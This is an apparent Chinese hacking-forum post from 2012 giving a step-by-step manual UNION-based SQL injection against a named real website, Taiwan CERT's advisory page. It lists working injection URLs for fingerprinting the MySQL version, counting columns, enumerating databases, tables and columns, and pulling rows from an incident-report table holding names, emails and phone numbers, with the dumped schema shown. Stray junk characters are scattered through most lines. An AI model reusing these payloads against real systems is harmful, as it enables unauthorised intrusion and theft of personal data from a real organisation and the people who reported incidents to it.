1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询7 |3 p n0 X* g; L& i- r3 E) y
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解. R0 V3 V% n3 h# o; p6 J, h# W/ ~
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
( g% ~ y- V3 O3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
5 n* _2 i8 Z+ W+ y* x数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。! v+ A# e0 T* n' J2 C
4.判断有没有写权限
; r: w6 k$ p, ?" Nhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限; M/ g( v( n% w5 D( L
没办法,手动猜表啦
! n$ m1 u' r# ?2 Y$ ^! Q6 K5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
! U5 Y* H; b8 i/ }7 f1 ]0 l. C但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
/ P$ \% Y6 B, ohttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--* q1 J; t* l3 l/ g0 u3 u+ q9 G+ e
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
% [" E6 X5 e- x2 V( qinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb6 _" ?5 H; Q! I5 A; }1 \* {* Z, H
6.爆表,爆的是twcert库. [" X# Q4 B( L; c0 g p
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
4 |- r$ A' _/ Y/ Q" r, i爆出如下表
8 K- O4 q) S' h' _* C' J, Hdownloadfile,irsys,newsdata,secrpt,secrpt_big5. Y5 e) h. e3 {7 k4 h
7.爆列名,这次爆的是irsys表1 `3 h! a* |% v( c' f0 n: r
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
3 t5 C; ~6 D$ A0 d爆出如下列
# k5 |$ q& F! N* Wir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
. v+ `) M3 z8 Q' a5 c) ]8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。/ Y* @! v2 J( D2 M& t
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
* ]8 U) g- f+ a; a, [. q返回是3,说明每个列里有3个地段: i3 \3 t+ [" }' q
9.爆字段内容
|) h8 ~& o. D3 l5 j }) E* Jhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
, E$ M; Z" V2 r" E- t爆出name列的第一个字段的内容
* Z0 f. Z% d, q g6 y& _9 o( s Fhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
0 _- P% Q/ p4 C# n1 u* w# P# Z爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对